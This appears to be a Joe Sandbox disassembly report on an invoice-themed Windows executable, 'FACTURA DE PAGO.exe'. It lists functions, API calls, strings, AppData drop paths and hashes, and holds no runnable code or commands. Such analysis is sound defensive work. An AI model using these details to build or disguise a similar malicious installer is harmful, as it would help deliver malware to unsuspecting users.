Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D

Function 00403F49 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29

Function 004030C7 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Non-executed Functions

Function 00405086 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004050E5
GetDlgItem.USER32(?,000003EE), ref: 004050F4
GetClientRect.USER32(?,?), ref: 00405131
GetSystemMetrics.USER32(00000002), ref: 00405138
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405159
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040516A
SendMessageA.USER32(?,00001001,00000000,?), ref: 0040517D
SendMessageA.USER32(?,00001026,00000000,?), ref: 0040518B
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040519E
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004051C0
ShowWindow.USER32(?,00000008), ref: 004051D4
GetDlgItem.USER32(?,000003EC), ref: 004051F5
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405205
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040521E
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040522A
GetDlgItem.USER32(?,000003F8), ref: 00405103

Part of subcall function 00403F49: SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57

GetDlgItem.USER32(?,000003EC), ref: 00405246
CreateThread.KERNEL32(00000000,00000000,Function_0000501A,00000000), ref: 00405254
CloseHandle.KERNEL32(00000000), ref: 0040525B
ShowWindow.USER32(00000000), ref: 0040527E
ShowWindow.USER32(?,00000008), ref: 00405285
ShowWindow.USER32(00000008), ref: 004052CB
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052FF
CreatePopupMenu.USER32 ref: 00405310
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405325
GetWindowRect.USER32(?,000000FF), ref: 00405345
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040535E
SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040539A
OpenClipboard.USER32(00000000), ref: 004053AA
EmptyClipboard.USER32 ref: 004053B0
GlobalAlloc.KERNEL32(00000042,?), ref: 004053B9
GlobalLock.KERNEL32(00000000), ref: 004053C3
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053D7
GlobalUnlock.KERNEL32(00000000), ref: 004053F0
SetClipboardData.USER32(00000001,00000000), ref: 004053FB
CloseClipboard.USER32 ref: 00405401

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
Instruction ID: a6ce54ef4cbaee69b9623da841507b5c48c0df4ae21fd636639bbbe11a9743ae
Opcode Fuzzy Hash: 3d83c7054a3b30a9ea95d535bbc07a084d735a6ee6b89b99bed3655396955496
Instruction Fuzzy Hash: 8EA13871900208BFEB119FA0DD89AAE7F79FB08355F10407AFA01BA1A0C7755E51DF69

Function 00404352 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004043A1
SetWindowTextA.USER32(00000000,?), ref: 004043CB
SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
CoTaskMemFree.OLE32(00000000), ref: 00404487
lstrcmpiA.KERNEL32(Space required: ,00429868), ref: 004044B9
lstrcatA.KERNEL32(?,Space required: ), ref: 004044C5
SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7

Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C

Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\FACTURA DE PAGO.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
Part of subcall function 00405F9A: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014

GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0

Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2

Strings

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 004044A2
A, xrefs: 00404475
Space required: , xrefs: 004044B3, 004044B8, 004044C3

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Space required:
API String ID: 2624150263-1533186396
Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69

Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189

Strings

C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna, xrefs: 0040211D

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna
API String ID: 123533781-4293336683
Opcode ID: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
Opcode Fuzzy Hash: b8ee83f4a2e520ff4dab12eb385b74956a589b44baa30f4280110cf77b52f418
Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
Opcode Fuzzy Hash: fcbf5a8c9ec62e423337e2823bce3077c6823eab4788f95c2f9143772be47a2f
Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A

Function 004064CB Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14

Function 00406CA2 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94

Function 0040405D Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
GetSysColor.USER32(?), ref: 0040412B
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
lstrlenA.KERNEL32(?), ref: 0040414C
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
GetDlgItem.USER32(?,0000040A), ref: 004041D2
SendMessageA.USER32(00000000), ref: 004041D5
GetDlgItem.USER32(?,000003E8), ref: 00404200
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
SetCursor.USER32(00000000), ref: 00404258
ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
LoadCursorA.USER32(00000000,00007F00), ref: 00404278
SetCursor.USER32(00000000), ref: 0040427B
SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB

Strings

(@@, xrefs: 00404260
open, xrefs: 00404263
N, xrefs: 004041EE
Space required: , xrefs: 0040422B

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: (@@$N$Space required: $open
API String ID: 3615053054-3333049044
Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98

Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,Trehagen Setup,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C
Trehagen Setup, xrefs: 00401150

Memory Dump Source

Source File: 00000000.00000002.1692409450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1692394349.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692473215.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692489785.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1692592821.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA DE PAGO.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F$Trehagen Setup
API String ID: 941294808-1307836353
Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5

Function 00405A78 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4

Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949

GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
wsprintfA.USER32 ref: 00405AEF
GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
GlobalFree.KERNEL32(00000000), ref: 00405BD8
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF

Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\FACTURA DE PAGO.exe,80000000,00000003), ref: 004059A6
Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8

Strings

[Rename], xrefs: 00405B59, 00405B6B
NUL, xrefs: 00405A81
%s=%s, xrefs: 00405AE5

